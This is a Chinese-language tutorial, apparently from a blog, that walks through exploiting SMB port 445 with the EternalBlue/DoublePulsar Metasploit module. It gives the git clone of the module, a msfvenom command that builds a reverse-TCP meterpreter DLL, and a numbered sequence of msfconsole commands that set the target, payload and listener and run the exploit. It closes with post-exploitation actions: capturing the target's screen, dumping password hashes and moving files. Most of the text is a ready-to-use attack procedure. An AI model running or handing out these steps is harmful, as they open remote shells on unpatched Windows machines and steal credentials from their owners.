445端口之Metasploit集成使用

前言:445对坏人而言是个好端口,对好人而言是个坏端口。(小孩子才分好坏么?我想也是)


使用环境:woobuntu(乌云版ubuntu),自带了MSF,不是最新版就sudo msfupdate吧升级一下。

下载msf关于445的漏洞模块:

git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git

这里需要说明一下,MSF所有模块都是在相应文件夹里的,所以,可以把clone下来的直接复制到的 /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.14.1/modules/exploits/windows/smb/ 这个目录下,也就是最新的445漏洞到smb目录下。

然后就是vi 修改目录下 /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.14.1/modules/exploits/windows/smb/eternalblue/eternalblue_doublepulsar 文件,主要需要修改如下:

修改好之后,保存。下面开始进入 MSF的使用。


一、首先,你需要用msf生成一个用来注入的dll。

命令如下:(我这里是64位的,如果是32位的,直接把x64去掉即可)

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.145.145 LPORT=5555 -f dll -o local.dll

然后把这个local.dll 文件复制到/home/username/.wine/drive_c/目录下即可。

二、进入MSF

msfconsole #这里不要用sudo msfconsole,要不然会找不到dll文件。

三、顺序执行如下命令即可
  1. reload_all        #重新加载所有模块,对于从网络上刚down下来的模块,需要执行这个命令。
  2. use exploit/windows/smb/eternalblue/eternalblue_doublepulsar       #使用这个模块
  3. set RHOST 192.168.145.xxx      #这是设置要测试的目标。
  4. set TARGETARCHITECTURE x64           #这是设置测试目标的电脑是32位还是64位,默认是32.
  5. set target 9                     #这里设置测试目标的系统类型,默认是id=8 ,windowsR8R2的,设置成9是 win7
  6. set PAYLOAD windows/x64/meterpreter/reverse_tcp      #这里在445漏洞模块中加载监听模块,用来接收反弹的shell。
  7. set LHOST 192.168.145.145          #这里设置监听的ip,即本机ip
  8. set LPORT 5555                     #这里设置监听的端口,要和上面生成的dll端口一样
  9. run                                   #执行
  10. 成功后即可执行命令,更多命令查看,执行 help即可。例如,截屏目标着桌面,dump下目标的hash码,上传下载…. And So On。

The End